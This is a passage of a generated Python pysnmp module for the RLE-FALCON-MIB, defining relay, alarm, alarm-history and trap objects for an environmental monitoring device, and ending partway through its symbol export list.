falconRelay1Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay1Status.setStatus('mandatory')
falconRelay1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Label.setStatus('mandatory')
falconRelay1Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay1Time.setStatus('mandatory')
# --- falconRelay2..falconRelay6 (subtrees ...4.2-...4.6) -------------------
# Same layout as falconRelay1: State / Status / Label / Time.
#
# FIX: the State enum label was "keypascontrolled" for relays 2-6 while
# falconRelay1State spells it "keypadcontrolled"; normalized to the
# Relay1 spelling. NOTE(review): enum labels affect only symbolic
# display, not the on-wire value — but if the vendor's published
# RLE-FALCON-MIB really contains the "keypas" typo, keeping parity with
# that MIB may be preferable; confirm before regenerating.
falconRelay2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2))
falconRelay2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2State.setStatus('mandatory')
falconRelay2Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay2Status.setStatus('mandatory')
falconRelay2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Label.setStatus('mandatory')
falconRelay2Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay2Time.setStatus('mandatory')
falconRelay3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3))
falconRelay3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3State.setStatus('mandatory')
falconRelay3Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay3Status.setStatus('mandatory')
falconRelay3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Label.setStatus('mandatory')
falconRelay3Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Time.setStatus('mandatory')
falconRelay4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4))
falconRelay4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4State.setStatus('mandatory')
falconRelay4Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay4Status.setStatus('mandatory')
falconRelay4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Label.setStatus('mandatory')
falconRelay4Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Time.setStatus('mandatory')
falconRelay5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5))
falconRelay5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5State.setStatus('mandatory')
falconRelay5Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay5Status.setStatus('mandatory')
falconRelay5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Label.setStatus('mandatory')
falconRelay5Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Time.setStatus('mandatory')
falconRelay6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6))
falconRelay6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypadcontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6State.setStatus('mandatory')
falconRelay6Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay6Status.setStatus('mandatory')
falconRelay6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Label.setStatus('mandatory')
falconRelay6Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Time.setStatus('mandatory')
# --- falconAlarms (subtree ...3184.1.1.1.5) --------------------------------
# Active-alarm reporting: a gauge of currently-present alarms, a table
# mapping alarm index -> alarm OID, and a set of well-known alarm
# ObjectIdentity values referenced by falconAlarmDescr. These objects
# use SMIv2 'current' status, unlike the 'mandatory' scalars above.
falconAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5))
# Number of alarms currently active.
falconAlarmsPresent = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmsPresent.setStatus('current')
# Table of active alarms, indexed by falconAlarmId.
falconAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2), )
if mibBuilder.loadTexts: falconAlarmTable.setStatus('current')
falconAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1), ).setIndexNames((0, "RLE-FALCON-MIB", "falconAlarmId"))
if mibBuilder.loadTexts: falconAlarmEntry.setStatus('current')
# Row index (PositiveInteger is a project-defined textual convention).
falconAlarmId = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 1), PositiveInteger())
if mibBuilder.loadTexts: falconAlarmId.setStatus('current')
# OID identifying the alarm, drawn from falconWellKnownAlarms below.
falconAlarmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmDescr.setStatus('current')
# Well-known alarm identities: four per analog input (High, Low, High2,
# Low2), assigned sequentially — input N occupies sub-ids 4N-3 .. 4N.
falconWellKnownAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3))
falconInput1HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 1))
if mibBuilder.loadTexts: falconInput1HighAlarm.setStatus('current')
falconInput1LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 2))
if mibBuilder.loadTexts: falconInput1LowAlarm.setStatus('current')
falconInput1High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 3))
if mibBuilder.loadTexts: falconInput1High2Alarm.setStatus('current')
falconInput1Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 4))
if mibBuilder.loadTexts: falconInput1Low2Alarm.setStatus('current')
falconInput2HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 5))
if mibBuilder.loadTexts: falconInput2HighAlarm.setStatus('current')
falconInput2LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 6))
if mibBuilder.loadTexts: falconInput2LowAlarm.setStatus('current')
falconInput2High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 7))
if mibBuilder.loadTexts: falconInput2High2Alarm.setStatus('current')
falconInput2Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 8))
if mibBuilder.loadTexts: falconInput2Low2Alarm.setStatus('current')
falconInput3HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 9))
if mibBuilder.loadTexts: falconInput3HighAlarm.setStatus('current')
falconInput3LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 10))
if mibBuilder.loadTexts: falconInput3LowAlarm.setStatus('current')
falconInput3High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 11))
if mibBuilder.loadTexts: falconInput3High2Alarm.setStatus('current')
falconInput3Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 12))
if mibBuilder.loadTexts: falconInput3Low2Alarm.setStatus('current')
falconInput4HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 13))
if mibBuilder.loadTexts: falconInput4HighAlarm.setStatus('current')
falconInput4LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 14))
if mibBuilder.loadTexts: falconInput4LowAlarm.setStatus('current')
falconInput4High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 15))
if mibBuilder.loadTexts: falconInput4High2Alarm.setStatus('current')
falconInput4Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 16))
if mibBuilder.loadTexts: falconInput4Low2Alarm.setStatus('current')
falconInput5HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 17))
if mibBuilder.loadTexts: falconInput5HighAlarm.setStatus('current')
falconInput5LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 18))
if mibBuilder.loadTexts: falconInput5LowAlarm.setStatus('current')
falconInput5High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 19))
if mibBuilder.loadTexts: falconInput5High2Alarm.setStatus('current')
falconInput5Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 20))
if mibBuilder.loadTexts: falconInput5Low2Alarm.setStatus('current')
falconInput6HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 21))
if mibBuilder.loadTexts: falconInput6HighAlarm.setStatus('current')
falconInput6LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 22))
if mibBuilder.loadTexts: falconInput6LowAlarm.setStatus('current')
falconInput6High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 23))
if mibBuilder.loadTexts: falconInput6High2Alarm.setStatus('current')
falconInput6Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 24))
if mibBuilder.loadTexts: falconInput6Low2Alarm.setStatus('current')
falconInput7HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 25))
if mibBuilder.loadTexts: falconInput7HighAlarm.setStatus('current')
falconInput7LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 26))
if mibBuilder.loadTexts: falconInput7LowAlarm.setStatus('current')
falconInput7High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 27))
if mibBuilder.loadTexts: falconInput7High2Alarm.setStatus('current')
falconInput7Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 28))
if mibBuilder.loadTexts: falconInput7Low2Alarm.setStatus('current')
falconInput8HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 29))
if mibBuilder.loadTexts: falconInput8HighAlarm.setStatus('current')
falconInput8LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 30))
if mibBuilder.loadTexts: falconInput8LowAlarm.setStatus('current')
falconInput8High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 31))
if mibBuilder.loadTexts: falconInput8High2Alarm.setStatus('current')
falconInput8Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 32))
if mibBuilder.loadTexts: falconInput8Low2Alarm.setStatus('current')
falconInput1DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 81))
if mibBuilder.loadTexts: falconInput1DigAlarm.setStatus('current')
falconInput2DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 82))
if mibBuilder.loadTexts: falconInput2DigAlarm.setStatus('current')
falconInput3DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 83))
if mibBuilder.loadTexts: falconInput3DigAlarm.setStatus('current')
falconInput4DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 84))
if mibBuilder.loadTexts: falconInput4DigAlarm.setStatus('current')
falconInput5DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 85))
if mibBuilder.loadTexts: falconInput5DigAlarm.setStatus('current')
falconInput6DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 86))
if mibBuilder.loadTexts: falconInput6DigAlarm.setStatus('current')
falconInput7DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 87))
if mibBuilder.loadTexts: falconInput7DigAlarm.setStatus('current')
falconInput8DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 88))
if mibBuilder.loadTexts: falconInput8DigAlarm.setStatus('current')
falconInput9DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 89))
if mibBuilder.loadTexts: falconInput9DigAlarm.setStatus('current')
falconInput10DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 90))
if mibBuilder.loadTexts: falconInput10DigAlarm.setStatus('current')
falconInput11DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 91))
if mibBuilder.loadTexts: falconInput11DigAlarm.setStatus('current')
falconInput12DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 92))
if mibBuilder.loadTexts: falconInput12DigAlarm.setStatus('current')
falconInput13DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 93))
if mibBuilder.loadTexts: falconInput13DigAlarm.setStatus('current')
falconInput14DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 94))
if mibBuilder.loadTexts: falconInput14DigAlarm.setStatus('current')
falconInput15DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 95))
if mibBuilder.loadTexts: falconInput15DigAlarm.setStatus('current')
falconInput16DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 96))
if mibBuilder.loadTexts: falconInput16DigAlarm.setStatus('current')
falconInput17DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 97))
if mibBuilder.loadTexts: falconInput17DigAlarm.setStatus('current')
falconInput18DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 98))
if mibBuilder.loadTexts: falconInput18DigAlarm.setStatus('current')
falconInput19DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 99))
if mibBuilder.loadTexts: falconInput19DigAlarm.setStatus('current')
falconInput20DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 100))
if mibBuilder.loadTexts: falconInput20DigAlarm.setStatus('current')
falconOnBatteryAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 102))
if mibBuilder.loadTexts: falconOnBatteryAlarm.setStatus('current')
falconLowBatteryAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 103))
if mibBuilder.loadTexts: falconLowBatteryAlarm.setStatus('current')
falconTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6))
falconAlarmEntryAdded = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,1))
falconAlarmEntryRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,2))
falconAccessGranted = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,3))
falconAccessDenied = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,4))
falconAlarmHistory = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7))
falconAlarmHistoryEntries = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmHistoryEntries.setStatus('current')
falconAlarmHistoryClear = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("clearbuffer", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAlarmHistoryClear.setStatus('mandatory')
falconAlarmHistoryTable = MibTable((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3), )
if mibBuilder.loadTexts: falconAlarmHistoryTable.setStatus('current')
falconAlarmHistoryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1), ).setIndexNames((0, "RLE-FALCON-MIB", "falconAlarmHistoryId"))
if mibBuilder.loadTexts: falconAlarmHistoryEntry.setStatus('current')
falconAlarmHistoryId = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1, 1), PositiveInteger())
if mibBuilder.loadTexts: falconAlarmHistoryId.setStatus('current')
falconAlarmHistoryText = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmHistoryText.setStatus('current')
falconTrapSettings = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8))
falconPersistantTraps = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconPersistantTraps.setStatus('mandatory')
falconAlarmAcknowledge = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("acknowledgeAlarms", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAlarmAcknowledge.setStatus('mandatory')
falcon8124 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 3))
# Register every object defined by this module with the MIB builder so that
# dependent modules (and management applications) can import them by name.
# The export list is auto-generated and split across two calls; do not edit
# or reorder the keyword arguments by hand.
mibBuilder.exportSymbols("RLE-FALCON-MIB", falconInput7LowLimit=falconInput7LowLimit, falconInput2Reading=falconInput2Reading, falconTraps=falconTraps, falconInput10Label=falconInput10Label, falconKeypadName18=falconKeypadName18, falconInput2UOM=falconInput2UOM, falconInput5Gain=falconInput5Gain, falconRelay3=falconRelay3, falconInput20Delay=falconInput20Delay, falconKeypadName19=falconKeypadName19, falconInput7Offset=falconInput7Offset, falconInput6Hysteresis=falconInput6Hysteresis, falconInput18Reading=falconInput18Reading, falconInput20State=falconInput20State, falconInput4High2Alarm=falconInput4High2Alarm, falconAlarmHistoryEntry=falconAlarmHistoryEntry, falconInput3Low2Alarm=falconInput3Low2Alarm, falconInput13RlyControl=falconInput13RlyControl, falconRelay5=falconRelay5, falconInput8Offset=falconInput8Offset, falconInput8LowLimit=falconInput8LowLimit, falconInput20RlyControl=falconInput20RlyControl, falconKeypadCode14=falconKeypadCode14, falconInput1LowLimit=falconInput1LowLimit, falconInput16Label=falconInput16Label, falconInput2HighAlarm=falconInput2HighAlarm, falconInput7DigAlarm=falconInput7DigAlarm, falconInput7RlyControl=falconInput7RlyControl, falconInput16Reading=falconInput16Reading, falconAccessGranted=falconAccessGranted, falconAlarmHistoryClear=falconAlarmHistoryClear, falconInput7Hysteresis=falconInput7Hysteresis, falconInput8LowAlarm=falconInput8LowAlarm, falconInput1Reading=falconInput1Reading, falconInput13Reading=falconInput13Reading, falconInput15Label=falconInput15Label, falconRelay6Status=falconRelay6Status, falconIdentManufacturer=falconIdentManufacturer, falconInput9Label=falconInput9Label, falconInput2Delay=falconInput2Delay, falconInput19Reading=falconInput19Reading, falconInput7Gain=falconInput7Gain, falconInput11State=falconInput11State, falconKeypadName17=falconKeypadName17, falconRelay6Label=falconRelay6Label, falconInput8Gain=falconInput8Gain, falconInput5State=falconInput5State, falconInput11Delay=falconInput11Delay, 
falconInput4Gain=falconInput4Gain, falconInput8HighLimit2=falconInput8HighLimit2, falconInput16DigAlarm=falconInput16DigAlarm, falconInput5HighLimit=falconInput5HighLimit, falconInput1LowAlarm=falconInput1LowAlarm, falconInput4HighLimit2=falconInput4HighLimit2, falconKeypadName2=falconKeypadName2, falconInput5Reading=falconInput5Reading, falconRelay3State=falconRelay3State, falconInput10State=falconInput10State, falconKeypadCode10=falconKeypadCode10, falconRelay1Label=falconRelay1Label, falconInput2Hysteresis=falconInput2Hysteresis, falconInput17RlyControl=falconInput17RlyControl, falconInput4Offset=falconInput4Offset, falconInput7Label=falconInput7Label, falconInput7HighLimit=falconInput7HighLimit, falconInput5Hysteresis=falconInput5Hysteresis, falconInput6Delay=falconInput6Delay, falconInput12RlyControl=falconInput12RlyControl, falconInput7=falconInput7, falconInput6UOM=falconInput6UOM, falconInput1UOM=falconInput1UOM, falconInput14Delay=falconInput14Delay, falconInput1LowLimit2=falconInput1LowLimit2, falconInput6DigAlarm=falconInput6DigAlarm, falconWellKnownAlarms=falconWellKnownAlarms, falconInput4Hysteresis=falconInput4Hysteresis, falconAnalogAverage=falconAnalogAverage, falconInput13Label=falconInput13Label, falconInput6Reading=falconInput6Reading, falconInput10Delay=falconInput10Delay, falconRelay4Status=falconRelay4Status, falconInput3HighAlarm=falconInput3HighAlarm, falconInput4RlyControl=falconInput4RlyControl, falconInput15DigAlarm=falconInput15DigAlarm, falconInput5Low2Alarm=falconInput5Low2Alarm, falconInput8Label=falconInput8Label, falconInput17=falconInput17, falconKeypadName3=falconKeypadName3, falconInput15=falconInput15, falconInput4UOM=falconInput4UOM, falconKeypadCode17=falconKeypadCode17, falconInput12Reading=falconInput12Reading, falconInput6LowLimit2=falconInput6LowLimit2, falconKeypadCode2=falconKeypadCode2, falconInput4HighLimit=falconInput4HighLimit, falconKeypadCode7=falconKeypadCode7, falconInput11Reading=falconInput11Reading, 
falconRelay5Time=falconRelay5Time, falconKeypadCode8=falconKeypadCode8, falconInput14Label=falconInput14Label, falconKeypadCode16=falconKeypadCode16, falconKeypadCode19=falconKeypadCode19, falconInput2DigAlarm=falconInput2DigAlarm, falconKeypadName10=falconKeypadName10, falconInput19State=falconInput19State, falconKeypadCode12=falconKeypadCode12, falconRelay5State=falconRelay5State, falconKeypadName9=falconKeypadName9, falconInput20DigAlarm=falconInput20DigAlarm, falconInput6LowLimit=falconInput6LowLimit, falconTrapSettings=falconTrapSettings, falconInput6LowAlarm=falconInput6LowAlarm, falconInput2HighLimit=falconInput2HighLimit, falconInput10=falconInput10, falconInput8HighAlarm=falconInput8HighAlarm, falconInput5UOM=falconInput5UOM, falconInput1Delay=falconInput1Delay, falconInput6State=falconInput6State, falconInput5DigAlarm=falconInput5DigAlarm, falconInput2State=falconInput2State, falconInput6Label=falconInput6Label, falconInput5Delay=falconInput5Delay, falconInput17State=falconInput17State, falconInput1DigAlarm=falconInput1DigAlarm, falconAlarmHistory=falconAlarmHistory, falconInput14State=falconInput14State, falconAlarmAcknowledge=falconAlarmAcknowledge, falconInput7Delay=falconInput7Delay, falcon=falcon, falconLowBatteryThreshold=falconLowBatteryThreshold, falconInput4LowLimit=falconInput4LowLimit, falconInput3High2Alarm=falconInput3High2Alarm, falconInput3LowLimit2=falconInput3LowLimit2, falconInput16RlyControl=falconInput16RlyControl, falconInput2RlyControl=falconInput2RlyControl, falconInput8Reading=falconInput8Reading, falconInput14RlyControl=falconInput14RlyControl, falconInput18=falconInput18, falconAlarmId=falconAlarmId, falconInputs=falconInputs, falconInput5RlyControl=falconInput5RlyControl, falconInput5Offset=falconInput5Offset, falconInput1Low2Alarm=falconInput1Low2Alarm, falconInput6HighLimit=falconInput6HighLimit, falconSystem=falconSystem, 